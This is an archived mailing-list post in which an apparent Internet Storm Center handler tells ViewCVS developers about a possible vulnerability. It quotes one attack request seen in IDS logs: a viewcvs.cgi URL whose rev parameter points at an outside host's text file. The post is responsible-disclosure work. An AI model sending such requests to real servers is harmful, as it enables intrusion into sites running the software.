[viewvc-dev] Possible vulnerability in ViewCVS

toby <[email protected]>
Newsgroups gmane.comp.version-control.cvs.viewcvs.devel
Message-ID <747811030801231330u62df15f5u35cacefaf702b453__22834.150461904$1201644865$gmane$org@mail.gmail.com>
Hello,
I'm one of the handlers at the Internet Storm Center. We just got a note
from one
of our contributors about seeing new strings showing up in their IDS that
suggest
a possible vulnerability in ViewCVS:

GET //viewcvs.cgi/snort/etc/sid-msg.map?rev=
http://nocsom.org/images/IDsafeon.txt???

The contributor has validated that it worked against some live sites online
but was unable to tell us which version was vulnerable.
Is this an attack you are already aware of? If so, which version is no
longer vulnerable? We'd like to warn our readers that this is showing up but
wanted to give you a heads-up and a chance to fix it if you weren't already
aware.

We look forward to your response.
Thanks,
toby
(handler on deck)
lmpx.com only provides a reader for public news (NNTP) servers. It is not affiliated with the servers or forums shown here and is not responsible for the content of articles, which is written by their respective authors.